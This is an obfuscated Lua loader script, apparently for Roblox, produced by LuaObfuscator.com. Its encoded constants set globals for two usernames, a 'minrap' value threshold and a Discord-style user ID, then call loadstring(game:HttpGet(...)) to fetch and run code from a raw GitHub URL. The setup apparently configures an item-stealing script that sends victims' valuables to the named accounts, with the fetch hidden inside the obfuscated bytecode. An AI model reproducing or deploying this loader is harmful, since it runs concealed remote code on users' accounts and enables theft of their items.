--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v88=v2(v0(v30,16));if v19 then local v110=v5(v88,v19);v19=nil;return v110;else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=0 + 0 ;local v90;while true do if (v89==(0 -(0 + 0))) then v90=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(1 + (957 -(892 + 65)))) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v90-(v90%1) ;end end else local v91=(1272 -(226 + 1044))^(v32-(569 -(367 + (479 -278)))) ;return (((v31%(v91 + v91))>=v91) and ((217 -99) -(32 + 85))) or (927 -(214 + 713)) ;end end local function v21() local v34=0 -(0 -0) ;local v35;while true do if (v34==(351 -(87 + 263))) then return v35;end if (v34==(180 -(67 + 113))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=(3 -2) + 0 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (5 -3) );v18=v18 + (954 -(802 + 150)) ;return (v37 * 256) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -(2 -0)) );v18=v18 + 3 + 1 ;return (v41 * (16778213 -(915 + 82))) + (v40 * (185570 -120034)) + (v39 * (150 + 106)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1188 -(1069 + 118) ;local v45=(v20(v43,2 -(4 -3) ,43 -23 ) * ((1 + 1)^((33 + 23) -24))) + v42 ;local v46=v20(v43,21,31 + 0 );local v47=((v20(v43,823 -(368 + 423) )==(3 -2)) and  -1) or (19 -(10 + (29 -21))) ;if (v46==(0 -0)) then if (v45==(442 -(416 + 26))) then return v47 * ((772 -(201 + 571)) -(0 -0)) ;else v46=1 + 0 ;v44=1138 -(116 + 1022) ;end elseif (v46==(3621 -1574)) then return ((v45==(438 -(145 + 293))) and (v47 * ((431 -(44 + 386))/(1486 -(998 + 488))))) or (v47 * NaN) ;end return v8(v47,v46-(325 + 698) ) * (v44 + (v45/(2^((902 -(814 + 45)) + (21 -12))))) ;end local function v25(v48) local v49=0;local v50;local v51;while true do if (v49==(1 + 0)) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=2;end if (v49==3) then return v6(v51);end if (v49==(887 -(261 + 624))) then v51={};for v111=(1748 -(760 + 987)) -(1913 -(1789 + 124)) , #v50 do v51[v111]=v2(v1(v3(v50,v111,v111)));end v49=1083 -(1020 + 60) ;end if (v49==(1423 -((1396 -(745 + 21)) + 793))) then v50=nil;if  not v48 then local v117=0 -(0 + 0) ;while true do if (v117==(0 -0)) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=3 -2 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99,v100) local v101=(function() return 396 -(115 + 281) ;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v101==0) then local v118=(function() return 0 -0 ;end)();local v119=(function() return;end)();while true do if (v118==0) then v119=(function() return 0;end)();while true do if ((1 + 0)~=v119) then else v101=(function() return 2 -1 ;end)();break;end if (v119~=0) then else v92=(function() return 0 -0 ;end)();v93=(function() return nil;end)();v119=(function() return 868 -(550 + 317) ;end)();end end break;end end end if (v101~=(1 -0)) then else local v120=(function() return 0;end)();while true do if (v120==(0 -0)) then local v123=(function() return 0;end)();while true do if (v123==(0 -0)) then while true do if (v92~=0) then else v93=(function() return v94();end)();if (v95(v93, #"|", #"]")==(285 -(134 + 151))) then local v174=(function() return 1665 -(970 + 695) ;end)();local v175=(function() return;end)();local v176=(function() return;end)();local v177=(function() return;end)();while true do if (v174==(5 -2)) then if (v95(v176, #"-19", #"xnx")~= #"~") then else v177[ #"?id="]=(function() return v98[v177[ #"http"]];end)();end v99[v100]=(function() return v177;end)();break;end if (1==v174) then local v179=(function() return 1990 -(582 + 1408) ;end)();while true do if (1==v179) then v174=(function() return 2;end)();break;end if (v179==(0 -0)) then v177=(function() return {v96(),v96(),nil,nil};end)();if (v175==0) then local v184=(function() return 0;end)();local v185=(function() return;end)();while true do if (v184==(0 -0)) then v185=(function() return 0;end)();while true do if (v185==0) then v177[ #"91("]=(function() return v96();end)();v177[ #"xnxx"]=(function() return v96();end)();break;end end break;end end elseif (v175== #"|") then v177[ #"xxx"]=(function() return v97();end)();elseif (v175==(7 -5)) then v177[ #"gha"]=(function() return v97() -((1826 -(1195 + 629))^16) ;end)();elseif (v175~= #"nil") then else local v190=(function() return 0;end)();local v191=(function() return;end)();while true do if (0==v190) then v191=(function() return 0 -0 ;end)();while true do if (v191==0) then v177[ #"xnx"]=(function() return v97() -((243 -(187 + 54))^16) ;end)();v177[ #"http"]=(function() return v96();end)();break;end end break;end end end v179=(function() return 1;end)();end end end if (v174==(782 -(162 + 618))) then if (v95(v176, #"]", #"[")~= #"{") then else v177[2 + 0 ]=(function() return v98[v177[2]];end)();end if (v95(v176,2 + 0 ,3 -1 )~= #"{") then else v177[ #"xxx"]=(function() return v98[v177[ #"nil"]];end)();end v174=(function() return 3;end)();end if ((0 -0)~=v174) then else local v180=(function() return 0 + 0 ;end)();while true do if (v180==1) then v174=(function() return 1;end)();break;end if (v180==(1636 -(1373 + 263))) then v175=(function() return v95(v93,1002 -(451 + 549) , #"xnx");end)();v176=(function() return v95(v93, #"?id=",2 + 4 );end)();v180=(function() return 1 -0 ;end)();end end end end end break;end end return v92,v93,v94,v95,v96,v97,v98,v99,v100;end end end end end end end;end)();local v53=(function() return function(v102,v103,v104) local v105=(function() return 0;end)();local v106=(function() return;end)();while true do if (0==v105) then v106=(function() return 0 -0 ;end)();while true do if (0~=v106) then else v102[v103-#"[" ]=(function() return v104();end)();return v102,v103,v104;end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #"~",v58 do local v68=(function() return 0 + 0 ;end)();local v69=(function() return;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (v68~=0) then else v69=(function() return 0 -0 ;end)();v70=(function() return nil;end)();v68=(function() return 1;end)();end if (v68==1) then v71=(function() return nil;end)();while true do if (v69~=(342 -(218 + 123))) then else if (v70== #"{") then v71=(function() return v21()~=(1581 -(1535 + 46)) ;end)();elseif (v70==2) then v71=(function() return v24();end)();elseif (v70== #"nil") then v71=(function() return v25();end)();end v59[v67]=(function() return v71;end)();break;end if (v69~=(0 + 0)) then else local v122=(function() return 0;end)();while true do if (v122==1) then v69=(function() return 1 + 0 ;end)();break;end if (v122==(560 -(306 + 254))) then v70=(function() return v21();end)();v71=(function() return nil;end)();v122=(function() return 1;end)();end end end end break;end end end v57[ #"-19"]=(function() return v21();end)();for v72= #"|",v23() do FlatIdent_104D4,Descriptor,v21,v20,v22,v23,v59,v54,v72=(function() return v52(FlatIdent_104D4,Descriptor,v21,v20,v22,v23,v59,v54,v72);end)();end for v73= #":",v23() do v55,v73,v28=(function() return v53(v55,v73,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...) local v74=v64;local v75=v65;local v76=v66;local v77=v27;local v78=(581 -(361 + 219)) + 0 ;local v79= -1;local v80={};local v81={...};local v82=v12("#",...) -1 ;local v83={};local v84={};for v107=1467 -(899 + 568) ,v82 do if (v107>=v76) then v80[v107-v76 ]=v81[v107 + 1 + (320 -(53 + 267)) ];else v84[v107]=v81[v107 + (2 -1) ];end end local v85=(v82-v76) + 1 ;local v86;local v87;while true do v86=v74[v78];v87=v86[604 -(268 + 76 + 259) ];if ((v87<=(294 -(60 + 230))) or (2709>=2874)) then if (v87<=(573 -(426 + 146))) then if (v87==(0 + 0)) then v84[v86[1458 -(282 + 1174) ]]=v86[814 -(569 + 242) ];else v78=v86[8 -(418 -(15 + 398)) ];end elseif ((343==343) and (v87<=(1 + 1))) then local v128;local v129,v130;local v131;local v132;v84[v86[2]]=v63[v86[1027 -(706 + (1300 -(18 + 964))) ]];v78=v78 + (1252 -(721 + (1994 -1464))) ;v86=v74[v78];v132=v86[1273 -(945 + 326) ];v131=v84[v86[(5 + 2) -4 ]];v84[v132 + 1 + 0 ]=v131;v84[v132]=v131[v86[704 -(271 + 429) ]];v78=v78 + 1 + 0 ;v86=v74[v78];v84[v86[1502 -(1408 + 92) ]]=v86[1089 -(461 + 625) ];v78=v78 + (1289 -(993 + 295)) ;v86=v74[v78];v132=v86[2];v129,v130=v77(v84[v132](v13(v84,v132 + 1 + 0 ,v86[1 + (852 -(20 + 830)) ])));v79=(v130 + v132) -(1172 -(418 + 753)) ;v128=0 + 0 + (126 -(116 + 10)) ;for v150=v132,v79 do v128=v128 + 1 + 0 + 0 ;v84[v150]=v129[v128];end v78=v78 + 1 + (738 -(542 + 196)) ;v86=v74[v78];v132=v86[1 + 1 ];v84[v132]=v84[v132](v13(v84,v132 + (530 -((870 -464) + 123)) ,v79));v78=v78 + ((517 + 1253) -(1749 + 20)) ;v86=v74[v78];v84[v86[1 + 1 ]]();v78=v78 + (1323 -(1249 + 73)) ;v86=v74[v78];v78=v86[2 + 1 ];elseif (v87==(1148 -(466 + 679))) then local v153=v86[4 -2 ];local v154,v155=v77(v84[v153](v13(v84,v153 + (2 -1) ,v86[1903 -(106 + 1794) ])));v79=(v155 + v153) -(1 + 0 + 0) ;local v156=0 + 0 ;for v162=v153,v79 do local v163=0 + 0 ;while true do if (v163==(0 -0)) then v156=v156 + 1 ;v84[v162]=v154[v156];break;end end end else do return;end end elseif (v87<=((47 -29) -11)) then if (v87<=(119 -(4 + 110))) then local v146=0;local v147;while true do if ((4630==4630) and (v146==((1496 -912) -(57 + 527)))) then v147=v86[2];v84[v147]=v84[v147](v13(v84,v147 + 1 ,v79));break;end end elseif ((v87>(1433 -(41 + 1386))) or (4182==1869)) then v84[v86[105 -(17 + 86) ]]();else v84[v86[2]]=v63[v86[(1554 -(1126 + 425)) + 0 ]];end elseif ((v87<=(17 -9)) or (4239<=3546)) then v84[v86[5 -3 ]][v86[169 -(122 + 44) ]]=v86[6 -2 ];elseif (v87==(29 -20)) then local v159=(405 -(118 + 287)) + 0 ;local v160;local v161;while true do if ((v159==0) or (3244<=2821)) then v160=v86[2];v161=v84[v86[11 -8 ]];v159=(1122 -(118 + 1003)) + 0 ;end if (v159==((2 -1) -0)) then v84[v160 + (66 -(30 + 35)) ]=v161;v84[v160]=v161[v86[3 + 1 ]];break;end end elseif (v84[v86[1259 -(1043 + 214) ]]==v86[15 -11 ]) then v78=v78 + (1213 -(323 + 889)) ;else v78=v86[(384 -(142 + 235)) -4 ];end v78=v78 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!103Q00028Q0003023Q005F4703083Q00557365726E616D65030B3Q00657363617061706461313403093Q00557365726E616D6532030F3Q00634841494E534E4154434845523235026Q00F03F03063Q006D696E726170025Q006AF84003083Q00646973637573657203123Q00393438333Q32332Q392Q34373430393334027Q0040030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403483Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F626F2Q7461682Q332F5468756E6465722D7A2F726566732F68656164732F6D61696E2F485542001B3Q00124Q00013Q00260A3Q0008000100010004013Q00080001001206000100023Q003008000100030004001206000100023Q00300800010005000600124Q00073Q00260A3Q000F000100070004013Q000F0001001206000100023Q003008000100080009001206000100023Q0030080001000A000B00124Q000C3Q00260A3Q00010001000C0004013Q000100010012060001000D3Q0012020002000E3Q00202Q00020002000F00122Q000400106Q000200046Q00013Q00024Q00010001000100044Q001A00010004013Q000100012Q00043Q00017Q00",v9(),...);
